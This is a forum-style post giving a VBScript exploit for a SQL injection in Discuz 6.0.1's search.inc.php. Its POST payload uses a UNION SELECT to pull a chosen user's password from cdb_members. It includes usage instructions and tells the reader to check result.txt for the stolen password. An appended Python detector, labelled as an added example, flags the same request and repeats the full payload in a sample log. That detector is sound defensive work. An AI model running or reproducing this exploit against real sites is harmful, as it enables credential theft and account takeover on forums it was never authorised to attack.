Below is a VBS version of the exploit code for the search.inc.php file vulnerability:

Dim strUrl, strSite, strPath, strUid

' Print the banner, then expect three arguments: site, path, uid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
    ShowU()
Else
    strSite = Args(0)
    strPath = Args(1)
    strUid = Args(2)
End If

' POST body: the searchid value carries a UNION SELECT that reads the
' password column of cdb_members for the given uid
strUrl = "action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid & "/*&do=submit"

' Send the request to index.php and print the raw response
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST", strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)

' Banner
Sub showB()
    With Wscript
        .Echo("+--------------------------=====================------------------------------+")
        .Echo("Exploit discuz6.0.1")
        .Echo("Code By Safe3")
        .Echo("+--------------------------=====================------------------------------+")
    End With
End Sub

' Usage text; exits the script
Sub showU()
    With Wscript
        .Echo("+--------------------------=====================------------------------------+")
        .Echo("用法:")
        .Echo(" cscript "&.ScriptName&" site path uid")
        .Echo("例子:")
        .Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
        .Echo("+--------------------------=====================------------------------------+")
        .Quit
    End With
End Sub

Look through result.txt yourself to find the retrieved password.
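Added example, not part of the original post: a Python check that flags the POST body this script sends, for use on captured request bodies. It assumes legitimate searchid values are plain integers; the tab-separated record format, the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Whitespace or /**/ comments, both used as keyword separators in the page's query.
_GAP = r"(?:\s|/\*.*?\*/)+"
UNION_SELECT = re.compile(r"\bunion" + _GAP + r"(?:all" + _GAP + r")?select\b", re.I | re.S)
# The page's query reads cdb_members; the table prefix is left open (assumption).
MEMBERS_TABLE = re.compile(r"\b\w*_members\b", re.I)

def inspect_search_post(body):
    """Return the reasons a form-encoded POST body looks like searchid injection."""
    # latin-1 maps every byte to one character, so a raw byte such as %cf survives.
    params = dict(parse_qsl(body, keep_blank_values=True, encoding="latin-1"))
    if params.get("action") != "search" or "searchid" not in params:
        return []
    sid = params["searchid"]
    checks = [
        ("searchid is not an integer", not re.fullmatch(r"[0-9]+", sid)),
        ("single quote in searchid", "'" in sid),
        ("high byte in searchid", any(ord(ch) > 0x7F for ch in sid)),
        ("UNION SELECT in searchid", bool(UNION_SELECT.search(sid))),
        ("members table named in searchid", bool(MEMBERS_TABLE.search(sid))),
    ]
    return [reason for reason, hit in checks if hit]

# Constructed sample: tab-separated "client<TAB>path<TAB>body" records (hypothetical format).
SAMPLE_LOG = [
    "198.51.100.7\t/forum/index.php\taction=search&searchid=22&do=submit",
    "198.51.100.9\t/forum/index.php\taction=search&searchid=22%cf' UNION SELECT "
    "1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit",
    "198.51.100.7\t/forum/index.php\taction=login&username=alice",
]

def scan(lines):
    """Return (client, reasons) for every record whose body is flagged."""
    hits = []
    for line in lines:
        client, _path, body = line.split("\t", 2)
        reasons = inspect_search_post(body)
        if reasons:
            hits.append((client, reasons))
    return hits

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, "; ".join(reasons))
```

The integer check alone is the strongest signal, since it does not depend on which SQL keywords or table names a request happens to use.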